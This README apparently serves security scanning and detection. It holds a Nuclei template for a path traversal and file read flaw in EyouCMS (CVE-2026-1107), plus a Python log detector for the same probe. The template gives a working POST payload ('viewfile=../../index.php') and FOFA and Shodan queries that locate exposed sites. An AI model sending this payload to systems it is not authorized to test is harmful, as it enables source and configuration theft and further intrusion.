README.md
```yaml
id: CVE-2026-1107

info:
  name: EyouCMS < 1.7.1 - Path Traversal & Arbitrary File Read
  author: Akuivan13
  severity: critical
  description: |
    Detects a critical Path Traversal vulnerability in EyouCMS versions up to 1.7.1.
    The issue exists in the 'check_userinfo' function within 'Diyajax.php', allowing unauthenticated remote attackers to read arbitrary files (Source Code Disclosure) via the 'viewfile' parameter. This often leads to RCE by exposing configuration files or combining with file upload flaws.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1107
    - https://github.com/eyoucms/eyoucms
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-22
  metadata:
    max-request: 1
    fofa-query: body="EyouCms"
    shodan-query: http.html:"EyouCms"
    verified: true
  tags: cve,cve2026,eyoucms,traversal,lfi,fileread,critical

http:
  - raw:
      - |
        POST /index.php?m=api&c=Diyajax&a=check_userinfo HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

        aid=1&viewfile=../../index.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<?php"
          - "define('APP_PATH'"
          - "require __DIR__"
        condition: or

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Note: This template validates the vulnerability by attempting to read the source code of index.php.
# If successful, it confirms the path traversal flaw without having to guess configuration file locations.
```
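As an added example (not part of the template or of the EyouCMS project), the following Python detector flags probes of the kind shown in the request above in recorded traffic. It assumes request records with `src`, `method`, `url` and `body` fields, as a WAF or request-logging reverse proxy would produce; those field names and the sample records are constructed for this example.

```python
"""Detection helper for CVE-2026-1107 probes against EyouCMS.

Added example, not part of the Nuclei template above. Request records
(method, URL, POST body) are assumed to come from a WAF or request-logging
proxy; the field names and sample data below are constructed for this example.
"""
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# The endpoint the template probes: index.php?m=api&c=Diyajax&a=check_userinfo
TARGET_ACTION = {"m": "api", "c": "diyajax", "a": "check_userinfo"}


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (catches double-encoded '../')."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(viewfile: str) -> bool:
    """True if the decoded viewfile value contains a '..' segment or is absolute."""
    decoded = fully_decode(viewfile).replace("\\", "/")
    if decoded.startswith("/"):
        return True
    return ".." in decoded.split("/")


def hits_target_action(url: str) -> bool:
    """True if the URL routes to the Diyajax check_userinfo action (case-insensitive)."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("index.php"):
        return False
    qs = parse_qs(parts.query)
    return all(qs.get(key, [""])[0].lower() == val for key, val in TARGET_ACTION.items())


def classify(record: dict) -> Optional[str]:
    """Return an alert string for a suspicious record, otherwise None."""
    if record.get("method", "").upper() != "POST":
        return None
    if not hits_target_action(record.get("url", "")):
        return None
    # parse_qs already decodes one layer; fully_decode handles further layers
    viewfile = parse_qs(record.get("body", "")).get("viewfile", [""])[0]
    if viewfile and is_traversal(viewfile):
        return (f"CVE-2026-1107 traversal probe from {record.get('src')}: "
                f"viewfile={fully_decode(viewfile)!r}")
    return None


def scan(records) -> list:
    """Run classify over every record and return the non-empty alerts."""
    return [alert for alert in map(classify, records) if alert]


# Constructed sample records (not real traffic); RFC 5737 documentation addresses.
SAMPLE_RECORDS = [
    {"src": "203.0.113.10", "method": "POST",
     "url": "/index.php?m=api&c=Diyajax&a=check_userinfo",
     "body": "aid=1&viewfile=../../index.php"},                       # plain probe
    {"src": "203.0.113.11", "method": "POST",
     "url": "/index.php?m=api&c=Diyajax&a=check_userinfo",
     "body": "aid=1&viewfile=%252e%252e%252f%252e%252e%252findex.php"},  # double-encoded
    {"src": "198.51.100.5", "method": "POST",
     "url": "/index.php?m=api&c=Diyajax&a=check_userinfo",
     "body": "aid=1&viewfile=user.htm"},                               # benign relative name
    {"src": "198.51.100.6", "method": "GET",
     "url": "/index.php?m=home&c=Index&a=index", "body": ""},          # unrelated request
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(alert)
```

The `viewfile` value travels in the POST body, so a plain web-server access log (request line only) will show nothing beyond repeated hits on the `Diyajax`/`check_userinfo` action; body inspection needs a WAF, a reverse proxy configured to log request bodies, or an application-side hook. The matching is case-insensitive and decodes repeatedly because a single `unquote` would miss the double-encoded variant in the second sample record.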